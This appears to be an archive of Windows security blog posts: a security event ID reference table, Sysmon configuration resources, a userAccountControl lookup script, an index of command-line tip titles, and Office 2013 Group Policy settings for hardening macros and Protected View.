| 4698 | 602 | Low | A scheduled task was created. |
| 4699 | 602 | Low | A scheduled task was deleted. |
| 4700 | 602 | Low | A scheduled task was enabled. |
| 4701 | 602 | Low | A scheduled task was disabled. |
| 4702 | 602 | Low | A scheduled task was updated. |
| 4704 | 608 | Low | A user right was assigned. |
| 4705 | 609 | Low | A user right was removed. |
| 4707 | 611 | Low | A trust to a domain was removed. |
| 4709 | N/A | Low | IPsec Services was started. |
| 4710 | N/A | Low | IPsec Services was disabled. |
| 4711 | N/A | Low | May contain any one of the following: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer. PAStore Engine applied Active Directory storage IPsec policy on the computer. PAStore Engine applied local registry storage IPsec policy on the computer. PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer. PAStore Engine failed to apply Active Directory storage IPsec policy on the computer. PAStore Engine failed to apply local registry storage IPsec policy on the computer. PAStore Engine failed to apply some rules of the active IPsec policy on the computer. PAStore Engine failed to load directory storage IPsec policy on the computer. PAStore Engine loaded directory storage IPsec policy on the computer. PAStore Engine failed to load local storage IPsec policy on the computer. PAStore Engine loaded local storage IPsec policy on the computer. PAStore Engine polled for changes to the active IPsec policy and detected no changes. |
| 4712 | N/A | Low | IPsec Services encountered a potentially serious failure. |
| 4717 | 621 | Low | System security access was granted to an account. |
| 4718 | 622 | Low | System security access was removed from an account. |
| 4720 | 624 | Low | A user account was created. |
| 4722 | 626 | Low | A user account was enabled. |
| 4723 | 627 | Low | An attempt was made to change an account's password. |
| 4725 | 629 | Low | A user account was disabled. |
| 4726 | 630 | Low | A user account was deleted. |
| 4728 | 632 | Low | A member was added to a security-enabled global group. |
| 4729 | 633 | Low | A member was removed from a security-enabled global group. |
| 4730 | 634 | Low | A security-enabled global group was deleted. |
| 4731 | 635 | Low | A security-enabled local group was created. |
| 4732 | 636 | Low | A member was added to a security-enabled local group. |
| 4733 | 637 | Low | A member was removed from a security-enabled local group. |
| 4734 | 638 | Low | A security-enabled local group was deleted. |
| 4738 | 642 | Low | A user account was changed. |
| 4740 | 644 | Low | A user account was locked out. |
| 4741 | 645 | Low | A computer account was changed. |
| 4742 | 646 | Low | A computer account was changed. |
| 4743 | 647 | Low | A computer account was deleted. |
| 4744 | 648 | Low | A security-disabled local group was created. |
| 4745 | 649 | Low | A security-disabled local group was changed. |
| 4746 | 650 | Low | A member was added to a security-disabled local group. |
| 4747 | 651 | Low | A member was removed from a security-disabled local group. |
| 4748 | 652 | Low | A security-disabled local group was deleted. |
| 4749 | 653 | Low | A security-disabled global group was created. |
| 4750 | 654 | Low | A security-disabled global group was changed. |
| 4751 | 655 | Low | A member was added to a security-disabled global group. |
| 4752 | 656 | Low | A member was removed from a security-disabled global group. |
| 4753 | 657 | Low | A security-disabled global group was deleted. |
| 4756 | 660 | Low | A member was added to a security-enabled universal group. |
| 4757 | 661 | Low | A member was removed from a security-enabled universal group. |
| 4758 | 662 | Low | A security-enabled universal group was deleted. |
| 4759 | 663 | Low | A security-disabled universal group was created. |
| 4760 | 664 | Low | A security-disabled universal group was changed. |
| 4761 | 665 | Low | A member was added to a security-disabled universal group. |
| 4762 | 666 | Low | A member was removed from a security-disabled universal group. |
| 4767 | 671 | Low | A user account was unlocked. |
| 4768 | 672,676 | Low | A Kerberos authentication ticket (TGT) was requested. |
| 4769 | 673 | Low | A Kerberos service ticket was requested. |
| 4770 | 674 | Low | A Kerberos service ticket was renewed. |
| 4771 | 675 | Low | Kerberos pre-authentication failed. |
| 4772 | 672 | Low | A Kerberos authentication ticket request failed. |
| 4774 | 678 | Low | An account was mapped for logon. |
| 4775 | 679 | Low | An account could not be mapped for logon. |
| 4776 | 680,681 | Low | The domain controller attempted to validate the credentials for an account. |
| 4777 | N/A | Low | The domain controller failed to validate the credentials for an account. |
| 4778 | 682 | Low | A session was reconnected to a Window Station. |
| 4779 | 683 | Low | A session was disconnected from a Window Station. |
| 4781 | 685 | Low | The name of an account was changed: |
| 4782 | N/A | Low | The password hash an account was accessed. |
| 4783 | 667 | Low | A basic application group was created. |
| 4784 | N/A | Low | A basic application group was changed. |
| 4785 | 689 | Low | A member was added to a basic application group. |
| 4786 | 690 | Low | A member was removed from a basic application group. |
| 4787 | 691 | Low | A nonmember was added to a basic application group. |
| 4788 | 692 | Low | A nonmember was removed from a basic application group. |
| 4789 | 693 | Low | A basic application group was deleted. |
| 4790 | 694 | Low | An LDAP query group was created. |
| 4793 | N/A | Low | The Password Policy Checking API was called. |
| 4800 | N/A | Low | The workstation was locked. |
| 4801 | N/A | Low | The workstation was unlocked. |
| 4802 | N/A | Low | The screen saver was invoked. |
| 4803 | N/A | Low | The screen saver was dismissed. |
| 4864 | N/A | Low | A namespace collision was detected. |
| 4869 | 773 | Low | Certificate Services received a resubmitted certificate request. |
| 4871 | 775 | Low | Certificate Services received a request to publish the certificate revocation list (CRL). |
| 4872 | 776 | Low | Certificate Services published the certificate revocation list (CRL). |
| 4873 | 777 | Low | A certificate request extension changed. |
| 4874 | 778 | Low | One or more certificate request attributes changed. |
| 4875 | 779 | Low | Certificate Services received a request to shut down. |
| 4876 | 780 | Low | Certificate Services backup started. |
| 4877 | 781 | Low | Certificate Services backup completed. |
| 4878 | 782 | Low | Certificate Services restore started. |
| 4879 | 783 | Low | Certificate Services restore completed. |
| 4880 | 784 | Low | Certificate Services started. |
| 4881 | 785 | Low | Certificate Services stopped. |
| 4883 | 787 | Low | Certificate Services retrieved an archived key. |
| 4884 | 788 | Low | Certificate Services imported a certificate into its database. |
| 4886 | 790 | Low | Certificate Services received a certificate request. |
| 4887 | 791 | Low | Certificate Services approved a certificate request and issued a certificate. |
| 4888 | 792 | Low | Certificate Services denied a certificate request. |
| 4889 | 793 | Low | Certificate Services set the status of a certificate request to pending. |
| 4891 | 795 | Low | A configuration entry changed in Certificate Services. |
| 4893 | 797 | Low | Certificate Services archived a key. |
| 4894 | 798 | Low | Certificate Services imported and archived a key. |
| 4895 | 799 | Low | Certificate Services published the CA certificate to Active Directory Domain Services. |
| 4898 | 802 | Low | Certificate Services loaded a template. |
| 4902 | N/A | Low | The Per-user audit policy table was created. |
| 4904 | N/A | Low | An attempt was made to register a security event source. |
| 4905 | N/A | Low | An attempt was made to unregister a security event source. |
| 4909 | N/A | Low | The local policy settings for the TBS were changed. |
| 4910 | N/A | Low | The Group Policy settings for the TBS were changed. |
| 4928 | N/A | Low | An Active Directory replica source naming context was established. |
| 4929 | N/A | Low | An Active Directory replica source naming context was removed. |
| 4930 | N/A | Low | An Active Directory replica source naming context was modified. |
4931 N/A Low An Active Directory replica destination naming context was modified.
4932 N/A Low Synchronization of a replica of an Active Directory naming context has begun.
4933 N/A Low Synchronization of a replica of an Active Directory naming context has ended.
4934 N/A Low Attributes of an Active Directory object were replicated.
4935 N/A Low Replication failure begins.
4936 N/A Low Replication failure ends.
4937 N/A Low A lingering object was removed from a replica.
4944 N/A Low The following policy was active when the Windows Firewall started.
4945 N/A Low A rule was listed when the Windows Firewall started.
4946 N/A Low A change has been made to Windows Firewall exception list. A rule was added.
4947 N/A Low A change has been made to Windows Firewall exception list. A rule was modified.
4948 N/A Low A change has been made to Windows Firewall exception list. A rule was deleted.
4949 N/A Low Windows Firewall settings were restored to the default values.
4950 N/A Low A Windows Firewall setting has changed.
4951 N/A Low A rule has been ignored because its major version number was not recognized by Windows Firewall.
4952 N/A Low Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.
4953 N/A Low A rule has been ignored by Windows Firewall because it could not parse the rule.
4954 N/A Low Windows Firewall Group Policy settings have changed. The new settings have been applied.
4956 N/A Low Windows Firewall has changed the active profile.
4957 N/A Low Windows Firewall did not apply the following rule:
4958 N/A Low Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:
4979 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4980 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4981 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4982 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4985 N/A Low The state of a transaction has changed.
5024 N/A Low The Windows Firewall Service has started successfully.
5025 N/A Low The Windows Firewall Service has been stopped.
5031 N/A Low The Windows Firewall Service blocked an application from accepting incoming connections on the network.
5032 N/A Low Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.
5033 N/A Low The Windows Firewall Driver has started successfully.
5034 N/A Low The Windows Firewall Driver has been stopped.
5039 N/A Low A registry key was virtualized.
5040 N/A Low A change has been made to IPsec settings. An Authentication Set was added.
5041 N/A Low A change has been made to IPsec settings. An Authentication Set was modified.
5042 N/A Low A change has been made to IPsec settings. An Authentication Set was deleted.
5043 N/A Low A change has been made to IPsec settings. A Connection Security Rule was added.
5044 N/A Low A change has been made to IPsec settings. A Connection Security Rule was modified.
5045 N/A Low A change has been made to IPsec settings. A Connection Security Rule was deleted.
5046 N/A Low A change has been made to IPsec settings. A Crypto Set was added.
5047 N/A Low A change has been made to IPsec settings. A Crypto Set was modified.
5048 N/A Low A change has been made to IPsec settings. A Crypto Set was deleted.
5050 N/A Low An attempt to programmatically disable the Windows Firewall using a call to InetFwProfile.FirewallEnabled(False)
5051 N/A Low A file was virtualized.
5056 N/A Low A cryptographic self test was performed.
5057 N/A Low A cryptographic primitive operation failed.
5058 N/A Low Key file operation.
5059 N/A Low Key migration operation.
5060 N/A Low Verification operation failed.
5061 N/A Low Cryptographic operation.
5062 N/A Low A kernel-mode cryptographic self test was performed.
5063 N/A Low A cryptographic provider operation was attempted.
5064 N/A Low A cryptographic context operation was attempted.
5065 N/A Low A cryptographic context modification was attempted.
5066 N/A Low A cryptographic function operation was attempted.
5067 N/A Low A cryptographic function modification was attempted.
5068 N/A Low A cryptographic function provider operation was attempted.
5069 N/A Low A cryptographic function property operation was attempted.
5070 N/A Low A cryptographic function property modification was attempted.
5125 N/A Low A request was submitted to the OCSP Responder Service
5126 N/A Low Signing Certificate was automatically updated by the OCSP Responder Service
5127 N/A Low The OCSP Revocation Provider successfully updated the revocation information
5136 566 Low A directory service object was modified.
5137 566 Low A directory service object was created.
5138 N/A Low A directory service object was undeleted.
5139 N/A Low A directory service object was moved.
5140 N/A Low A network share object was accessed.
5141 N/A Low A directory service object was deleted.
5152 N/A Low The Windows Filtering Platform blocked a packet.
5153 N/A Low A more restrictive Windows Filtering Platform filter has blocked a packet.
5154 N/A Low The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.
5155 N/A Low The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.
5156 N/A Low The Windows Filtering Platform has allowed a connection.
5157 N/A Low The Windows Filtering Platform has blocked a connection.
5158 N/A Low The Windows Filtering Platform has permitted a bind to a local port.
5159 N/A Low The Windows Filtering Platform has blocked a bind to a local port.
5378 N/A Low The requested credentials delegation was disallowed by policy.
5440 N/A Low The following callout was present when the Windows Filtering Platform Base Filtering Engine started.
5441 N/A Low The following filter was present when the Windows Filtering Platform Base Filtering Engine started.
5442 N/A Low The following provider was present when the Windows Filtering Platform Base Filtering Engine started.
5443 N/A Low The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.
5444 N/A Low The following sublayer was present when the Windows Filtering Platform Base Filtering Engine started.
5446 N/A Low A Windows Filtering Platform callout has been changed.
5447 N/A Low A Windows Filtering Platform filter has been changed.
5448 N/A Low A Windows Filtering Platform provider has been changed.
5449 N/A Low A Windows Filtering Platform provider context has been changed.
5450 N/A Low A Windows Filtering Platform sublayer has been changed.
5451 N/A Low An IPsec Quick Mode security association was established.
5452 N/A Low An IPsec Quick Mode security association ended.
5456 N/A Low PAStore Engine applied Active Directory storage IPsec policy on the computer.
5457 N/A Low PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.
5458 N/A Low PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.
5459 N/A Low PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.
5460 N/A Low PAStore Engine applied local registry storage IPsec policy on the computer.
5461 N/A Low PAStore Engine failed to apply local registry storage IPsec policy on the computer.
5462 N/A Low PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.
5463 N/A Low PAStore Engine polled for changes to the active IPsec policy and detected no changes.
5464 N/A Low PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.
5465 N/A Low PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.
5466 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.
5467 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used.
5468 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.
5471 N/A Low PAStore Engine loaded local storage IPsec policy on the computer.
5472 N/A Low PAStore Engine failed to load local storage IPsec policy on the computer.
5473 N/A Low PAStore Engine loaded directory storage IPsec policy on the computer.
5474 N/A Low PAStore Engine failed to load directory storage IPsec policy on the computer.
5477 N/A Low PAStore Engine failed to add quick mode filter.
5479 N/A Low IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.
5632 N/A Low A request was made to authenticate to a wireless network.
5633 N/A Low A request was made to authenticate to a wired network.
5712 N/A Low A Remote Procedure Call (RPC) was attempted.
5888 N/A Low An object in the COM+ Catalog was modified.
5889 N/A Low An object was deleted from the COM+ Catalog.
5890 N/A Low An object was added to the COM+ Catalog.
6008 N/A Low The previous system shutdown was unexpected
6144 N/A Low Security policy in the Group Policy objects has been applied successfully.
6272 N/A Low Network Policy Server granted access to a user.
N/A 561 Low A handle to an object was requested.
N/A 563 Low Object open for delete
N/A 625 Low User Account Type Changed
N/A 613 Low IPsec policy agent started
N/A 614 Low IPsec policy agent disabled
N/A 615 Low IPsec policy agent
N/A 616 Low IPsec policy agent encountered a potential serious failure
24577 N/A Low Encryption of volume started
24578 N/A Low Encryption of volume stopped
24579 N/A Low Encryption of volume completed
24580 N/A Low Decryption of volume started
24581 N/A Low Decryption of volume stopped
24582 N/A Low Decryption of volume completed
24583 N/A Low Conversion worker thread for volume started
24584 N/A Low Conversion worker thread for volume temporarily stopped
24588 N/A Low The conversion operation on volume %2 encountered a bad sector error. Please validate the data on this volume
24595 N/A Low Volume %2 contains bad clusters. These clusters will be skipped during conversion.
24621 N/A Low Initial state check: Rolling volume conversion transaction on %2.
5049 N/A Low An IPsec Security Association was deleted.
5478 N/A Low IPsec Services has started successfully.

Note

Refer to Microsoft Support article 947226 for lists of many security event IDs and their meanings.

Run wevtutil gp Microsoft-Windows-Security-Auditing /ge /gm:true to get a very detailed listing of all security event IDs.

For more information about Windows security event IDs and their meanings, see the Microsoft Support articles Description of security events in Windows Vista and in Windows Server 2008 and Description of security events in Windows 7 and in Windows Server 2008 R2. You can also download Security Audit Events for Windows 7 and Windows Server 2008 R2 and Windows 8 and Windows Server 2012 Security Event Details, which provide detailed event information for the referenced operating systems in spreadsheet format.

Sysmon - DFIR

source https://github.com/MHaggis/sysmon-dfir | 10 February 2018

Sysmon - DFIR

A curated list of resources for learning about deploying, managing and hunting with Microsoft Sysmon. Contains presentations, deployment methods, configuration file examples, blogs and additional github repositories.

Sysmon Learning Resources

General

Sysmon Configuration

@SwiftOnSecurity config

Recommended.

Config will assist with bringing you up to speed in relation to critical process monitoring, network utilization, and so on. Note that the concept is to not log everything, but the most important items.

https://github.com/SwiftOnSecurity/sysmon-config

Sysmon_config.xml

Solid, detailed config. Probably one of the best ones out there in relation to completeness.

MalwareArchaeology

Sysmon-a.cfg

Basic config that will monitor critical Windows process execution. Very basic, but a good config to get used to sysmon and how things operate.

Blog post by blacklanternsecurity

Sysmon-b.cfg

Crypsis Group published config and PDF. Fairly detailed list of excludes that should assist with understanding how they work and get a configuration started.

Crypsis Group Config

Crypsis Group PDF

Sysmon-c.cfg

Great configuration to understand excludes and contains.

Decent Security Config

Sysmon-d.cfg

Solid blog post related to getting started with Sysmon. Config is nicely laid out and easy to understand.

909Research Blog

Sysmon-e.cfg

Config is specific but it provides a good foundation for capturing a lot of specific data.

https://github.com/Prevenity/sysmon

(Comments translated to English)

StartLogging.xml

Provided by https://github.com/VVard0g - Roberto Rodriguez

https://gist.github.com/VVard0g/136481552d8845e52962534d1a4b8664

Sysmoncfg_v2|31.xml

Related material from Splunking the Endpoint .conf talk by James Brodsky and Dimitri McKay.

Splunking the Endpoint - Files from presentation

Configs are optimized for Splunk.

Additional configs

Configs are updated frequently.

SwiftOnSecurity Fork by Ion-Storm

Server Config: https://gist.github.com/Neo23x0/a4b4af9481e01e749409

Client config: https://gist.github.com/Neo23x0/f56bea38d95040b70cf5

MSSQL LDAP ADSI provider

13 December 2017

-- Lookup table mapping common userAccountControl values to a readable description
CREATE TABLE #UserAccountControl
    (
      UserAccountControlValue INT
    , UserAccountControlDescription VARCHAR(1000)
    )

-- Values are the NORMAL_ACCOUNT bit (512) combined with the disable,
-- password-not-required, password-never-expires and smartcard-required bits
INSERT  #UserAccountControl
        ( UserAccountControlValue, UserAccountControlDescription )
VALUES  ( 512, 'Enabled Account' ),
        ( 514, 'Disabled Account' ),
        ( 544, 'Enabled, Password Not REQUIRED' ),
        ( 546, 'Disabled, Password Not REQUIRED' ),
        ( 66048, 'Enabled, Password Doesn''t Expire' ),
        ( 66050, 'Disabled, Password Doesn''t Expire' ),
        ( 66080, 'Enabled, Password Doesn''t Expire & Not Required' ),
        ( 66082, 'Disabled, Password Doesn''t Expire & Not Required' ),
        ( 262656, 'Enabled, Smartcard REQUIRED' ),
        ( 262658, 'Disabled, Smartcard Required' ),
        ( 262688, 'Enabled, Smartcard Required, Password Not REQUIRED' ),
        ( 262690, 'Disabled, Smartcard Required, Password Not Required' ),
        ( 328192, 'Enabled, Smartcard Required, Password Doesn''t Expire' ),
        ( 328194, 'Disabled, Smartcard Required, Password Doesn''t Expire' ),
        ( 328224,
          'Enabled, Smartcard Required, Password Doesn''t Expire & Not Required' ),
        ( 328226,
          'Disabled, Smartcard Required, Password Doesn''t Expire & Not Required' )
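The lookup table above only matches the 16 exact values it lists. As an added example (not from the original post, and written in PowerShell rather than T-SQL), the following decodes userAccountControl as bit flags, which reproduces the table's descriptions and also handles combinations the table omits; the flag constants are Microsoft's documented ADS_UF_* values and the sample input is constructed.

```powershell
# Added example (not from the original post): derive the table's descriptions from the
# userAccountControl bit flags instead of an exact-value lookup, so values the table
# does not list (e.g. a locked-out account) are still decoded.
# Flag constants are the documented ADS_UF_* bits; sample values below are constructed.

$UacFlags = [ordered]@{
    ACCOUNTDISABLE       = 0x00002
    LOCKOUT              = 0x00010
    PASSWD_NOTREQD       = 0x00020
    NORMAL_ACCOUNT       = 0x00200
    DONT_EXPIRE_PASSWORD = 0x10000
    SMARTCARD_REQUIRED   = 0x40000
}

function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)

    # Names of every known flag that is set in the value
    $set = @($UacFlags.GetEnumerator() |
             Where-Object { ($Value -band $_.Value) -ne 0 } |
             ForEach-Object { $_.Key })

    # Build the same wording the SQL lookup table uses
    if ($set -contains 'ACCOUNTDISABLE') { $parts = @('Disabled') } else { $parts = @('Enabled') }
    if ($set -contains 'SMARTCARD_REQUIRED')   { $parts += 'Smartcard Required' }
    if ($set -contains 'DONT_EXPIRE_PASSWORD') { $parts += "Password Doesn't Expire" }
    if ($set -contains 'PASSWD_NOTREQD')       { $parts += 'Password Not Required' }
    if ($set -contains 'LOCKOUT')              { $parts += 'Locked Out' }

    # Report any bits outside the known set so nothing is silently dropped
    $known = 0
    foreach ($v in $UacFlags.Values) { $known = $known -bor $v }
    $unknown = $Value -band (-bnot $known)

    [pscustomobject]@{
        Value       = $Value
        Flags       = ($set -join '|')
        Description = ($parts -join ', ')
        UnknownBits = ('0x{0:X}' -f $unknown)
    }
}

# Constructed sample: four values from the table plus 528 (NORMAL_ACCOUNT | LOCKOUT),
# which the exact-value table would not match at all
512, 514, 66080, 328226, 528 | ForEach-Object { ConvertFrom-UserAccountControl -Value $_ } | Format-Table -AutoSize
```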
Categories: Windows

The Software Update Checker

find vulnerable software | 9 June 2017
  • FileHippo AppManager

  • Secunia Personal Software Inspector (PSI)

  • Software Update Monitor (SUMo)

Command Line Kung Fu

14 March 2017

source: http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html

Auditing

The Advantage of "sort" to View Passwords
Avoiding LANMAN False Positives
"chage" to Get/Set Password Security Parameters
Change a User's Password to Blank
Find Accounts With Superuser Privileges
Finding Duplicate User IDs
Finding Null Passwords
Lock Out Users Remotely While Preserving Session
Lock Screen With "tsdiscon"
"net use" and The Blank Passwords
Show Account Security Settings
Show Domain-Wide Settings For Accounts
Suspicious Password Entries
Why "wmic" Remote Lock Fails?
"wmic" to Display Users' SID
Workaround to View Windows Password Hashes


Forensics

Better "find" with touch
Determine where a USB device was plugged into
Display File Creation Time
Listing Files by Inode as a Proxy for Creation Time
Remotely Pull USB info
Show USB vendor/serial number 
USB History
Watch File Count in a Directory

Network Troubleshooting

Hack to Pull Out a Specific Protocol From "netstat" Output (Linux)
Kill Process by TCP/UDP port number
Learn About Network Traffic
"netstat" vs "lsof"
Protocol Stats
"watch" vs "netstat -c" 

Penetration Testing

The Broadcast Ping
Command-Line Ping Sweeper
Detecting when a scan reaches a given target
Firewall Chains
Look at Firewall Configs
Reverse DNS Records
See the Number of Times a Firewall Rule Was Triggered
Show Ports Allowed Through Firewall
Show Programs Allowed Through Firewall
Speed Up Ping


System Administration


Aborting a System Shutdown
Browsing the Registry with Powershell  
Careful with iptables "INPUT"
Converting Unix timestamps to human-readable form 
Disable The Guest Account 
Dropping Firewall Dead
Execute a Command En Mass
"find ...| xargs ..." vs "find ... -exec ..."
"findstr /m" to Print Only File Name
Find Files That Only Contain Printable ASCII With "findstr /p" (But be Aware)
Finding Names of Files Matching a String
Having Fun with Firewall
The Importance of Putting Your System's Hostname
IPTables or The Simplified Firewall Configuration
Linking Files
Listing Files and Their Sizes
Listing the largest 100 files
Poke Holes Through The Firewall
Reboot in [N] Seconds
Remote Command Execution
Simplify Your Life With "ufw"
SSH: Using "user@host" vs "-l" 
Symlink to an Entire Directory
What is hogging up the space?
WScript to Create Link For Files and Folders

Text Manipulation

Backup Before You Change With "sed"
Build Your Own "uniq" Command on Windows
Convert Multiple-Line Output into a Single Line Using "tr"
Convert Text Formats - Dos to Unix
Extra Little File to Help
"for" loops to parse text
Have "sed" Use Extended Regular Expressions
Replacing Strings in Multiple Files
Replacing Text Powershell Way
The Single Quote, The Double Quote, and The "FOR" Loop
When "sed" is better than "awk"

 

Windows Active Directory analysis

11 November 2016
https://gallery.technet.microsoft.com/Active-Directory-Audit-7754a877#!

CIS on Windows 7

2 November 2016

Security Configuration Benchmark For

Version 1.1.0
July 30th 2010
Microsoft Windows 7

https://benchmarks.cisecurity.org/tools2/windows/CIS_Microsoft_Windows_7_Benchmark_v1.1.0.pdf

ABW on Windows

18 September 2016

Secure Coding Guidelines

13 March 2016

IIS - URLScan - protect IIS

13 March 2016
Categories: Tools, Windows

Windows GPO local and domain for Office 2013

8 March 2016

Administrative templates:

32-bit (11.2 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_32bit.exe
64-bit (11.4 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_64bit.exe

Extract the archive and locate the .admx and .adml files.

Local workstation:

  • .admx: move to C:\Windows\PolicyDefinitions
  • .adml: move to C:\Windows\PolicyDefinitions\en-US

Domain controller:

  • .admx: move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions
  • .adml: move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions\en-US

Run gpedit.msc

MOST important setting

GPO setting: value (option)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Automation Security: Enabled (Set the Automation Security Level: Use application macro security level)

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
  • Allow mix of policy and user locations: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Outlook 2013\Security\Trust Center
  • Apply macro security settings to macros, add-ins and additional actions: Enabled
  • Security setting for macros: Enabled (Security Level: Never warn, disable all)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

Medium important setting

GPO setting: value (option)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
  • Allow mix of policy and user locations: Disabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Disable All ActiveX: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Turn off error reporting for files that fail file validation: Enabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\File Block Settings
  • dBase III / IV files: Enabled (File block setting: Block)
  • Dif and Sylk files: Enabled (File block setting: Block)
  • Excel 2 macrosheets and add-in files: Enabled (File block setting: Block)
